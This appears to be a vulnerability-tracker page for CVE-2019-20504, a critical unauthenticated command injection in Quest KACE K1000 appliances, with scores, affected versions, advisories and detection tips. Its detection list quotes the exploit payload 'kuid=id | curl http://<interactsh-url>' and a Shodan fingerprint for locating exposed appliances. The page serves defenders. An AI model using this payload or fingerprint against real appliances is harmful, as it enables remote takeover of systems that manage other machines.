CVE-2019-20504
published 2020-03-09CVE-2019-20504: service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell…
PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
9.18%
94.7th percentile
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| quest | kace_systems_management | < 6.4.120822 | 6.4.120822 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploitation attempts by monitoring POST requests to /service/krashrpt.php containing shell metacharacters (e.g., |, ;, `, $()) in the 'kuid' parameter. ↗
- →Use an out-of-band (OOB) DNS/HTTP interaction callback to confirm blind RCE — the exploit PoC uses 'kuid=id | curl http://<interactsh-url>' and confirms exploitation via DNS interaction. ↗
- →Fingerprint vulnerable K1000 appliances exposed on the internet via Shodan using the HTML keyword 'K1000 Logo'. ↗
- →The endpoint /service/krashrpt.php is unauthenticated; any POST to this path with a 'kuid' parameter containing shell metacharacters should be treated as a high-confidence attack indicator. ↗
- ·The Nuclei template uses a two-step flow: first confirming the target is a K1000 appliance (body contains 'K1000'), then sending the exploit payload. Detection logic should similarly chain host fingerprinting with payload inspection to reduce false positives. ↗
- ·Exploitation is confirmed via out-of-band DNS callback (interactsh), meaning network-level egress filtering on the target appliance may prevent callback-based detection even when the vulnerability is present and exploitable. ↗
- ·Affected versions are strictly before 6.4 SP3 (6.4.120822); version 6.4.120756 is explicitly cited as vulnerable. Detections should be scoped to these versions. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j9w6-cc5g-25xw: service/krashrpt
ghsa_unreviewed·2022-05-24
CVE-2019-20504 [HIGH] GHSA-j9w6-cc5g-25xw: service/krashrpt
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
VulnCheck
quest kace_systems_management Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-20504 [CRITICAL] quest kace_systems_management Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
quest kace_systems_management Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
Affected: quest kace_systems_management
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-29&host_type=src&vulnerability=cve-2019-20504
No detection rules found.
Nuclei
Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-20504 [CRITICAL] Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
Template:
id: CVE-2019-20504
info:
name: Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: |
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
impact: |
Unauthenticated attackers can execute arbitrary system commands via shell metacharacters, leading to complete server compromise and access to all managed
No writeups or analysis indexed.
2020-03-09
Published
Exploited in the wild